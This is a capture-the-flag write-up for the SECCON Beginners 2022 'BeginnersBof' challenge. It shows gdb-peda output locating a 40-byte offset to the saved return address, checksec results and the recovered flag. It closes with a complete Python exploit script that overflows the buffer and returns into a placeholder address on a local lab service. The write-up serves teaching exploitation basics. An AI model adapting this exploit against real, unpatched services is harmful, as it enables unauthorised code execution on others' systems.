Setting up the challenge

$ git clone https://github.com/SECCON/Beginners_CTF_2022
$ cd Beginners_CTF_2022/pwnable/BeginnersBof
$ docker-compose up -d
$ nc localhost 9000
How long is your name?
Analysis with peda (confirming the BOF)

1. Give an arbitrary size; 51 is used here
2. Enter 50 'a' characters plus a newline

Result: this input is already enough to overflow the name buffer.

gdb-peda$ c
Continuing.
How long is your name? 51
What's your name? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Analysis with peda (finding the offset)

The patto command reports where a fragment of the peda pattern sits inside the pattern. The 50-byte input below is that pattern; when the function returns through the overwritten saved RIP, the crash happens at the ret and RSP points at the overwritten return address, so the fragment found at RSP, "AA0AAFAAbA", gives the distance from the start of the buffer to the saved return address: 40 bytes.

gdb-peda$ r
gdb-peda$ c
Continuing.
How long is your name? 51
What's your name? AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
gdb-peda$ patto AA0AAFAAbA
AA0AAFAAbA found at offset: 40
Exploit!

The checksec output printed by pwntools is what makes the plain return-address overwrite work: no stack canary, so the overflow is not detected before ret; no PIE, so the address to return to is fixed at load time; NX enabled, so shellcode on the stack would not run and the payload returns into code already in the binary instead.

$ ls
chall  exploit.py
$ python3 ./exploit.py
[*] '/home/lilium/src/github.com/SECCON/Beginners_CTF_2022/pwnable/BeginnersBof/exploit/chall'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to localhost on port 9000: Done
ctf4b{Y0u_4r3_4lr34dy_4_BOF_M45t3r!}
[*] Closed connection to localhost port 9000
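The two steps of the writeup, finding the saved-RIP offset with a cyclic pattern (what peda's patto does on the previous slide) and sending the overflow payload (what the page's exploit.py does), carried through as an added example. This is not the page's exploit.py and not the challenge author's code; it uses only the Python standard library, no pwntools. Assumptions, labelled in the code as well: the pattern is a generic de Bruijn pattern rather than peda's exact alphabet, the declared length is taken to be one more than the number of name bytes accepted (the session above accepted 50 bytes plus a newline for "51"), the name is read up to a newline, and WIN_ADDR is a placeholder for the address of the flag-printing function, which the page does not give and which you would read from `nm ./chall`.

```python
import itertools
import socket
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
WINDOW = 4  # every 4-byte window of the pattern is unique, as in pwntools' cyclic()


def _de_bruijn(alphabet: bytes, n: int):
    """Yield the de Bruijn sequence B(k, n) over `alphabet` (textbook recursive algorithm)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (peda: `pattern create`, pwntools: cyclic())."""
    return bytes(itertools.islice(_de_bruijn(ALPHABET, WINDOW), length))


def cyclic_find(crash_value, length: int = 4096) -> int:
    """Offset of the fragment that landed in RSP/RIP (peda: `patto`).

    `crash_value` is either the raw bytes read from the stack or the integer shown
    in the register dump; for an integer the little-endian byte order is undone first.
    """
    if isinstance(crash_value, int):
        crash_value = struct.pack("<Q", crash_value)
    needle = crash_value[:WINDOW]
    offset = cyclic(length).find(needle)
    if offset < 0:
        raise ValueError("fragment not found: not from this pattern, or pattern too short")
    return offset


def build_payload(offset: int, ret_addr: int, filler: bytes = b"A") -> bytes:
    """`offset` bytes of filler followed by the 8-byte little-endian return address.

    Assumption: the name is read up to a newline, so a payload whose address contains
    0x0a would be cut short. Refuse it instead of sending a silently truncated payload.
    """
    payload = filler * offset + struct.pack("<Q", ret_addr)
    if b"\n" in payload:
        raise ValueError("payload contains a newline; the read would stop early")
    return payload


def send_exploit(host: str, port: int, payload: bytes, timeout: float = 3.0) -> bytes:
    """Replay the interaction shown on the page and return whatever the service prints."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(4096)                              # "How long is your name? "
        s.sendall(b"%d\n" % (len(payload) + 1))   # assumption: declared length = bytes + 1 (51 took 50 + '\n')
        s.recv(4096)                              # "What's your name? "
        s.sendall(payload + b"\n")
        out = b""
        try:
            while chunk := s.recv(4096):
                out += chunk
        except socket.timeout:
            pass
        return out


if __name__ == "__main__":
    # Step 1, as done in gdb above: feed the 50-byte pattern, then take the value found at RSP.
    pattern = cyclic(50)
    rsp_value = int.from_bytes(pattern[40:48], "little")  # constructed: stands in for the value peda showed at RSP
    offset = cyclic_find(rsp_value)                        # 40 for this pattern
    # Step 2: overwrite the saved return address. WIN_ADDR is a placeholder; use the real
    # address of the flag-printing function from `nm ./chall` (the binary is not PIE).
    WIN_ADDR = 0x401196
    payload = build_payload(offset, WIN_ADDR)
    print(send_exploit("localhost", 9000, payload).decode(errors="replace"))
```

Because the binary is loaded at 0x400000 without PIE, every code address has a zero top half, which is harmless here since the read is length-bounded rather than NUL-terminated; the byte to watch for is 0x0a, which build_payload rejects.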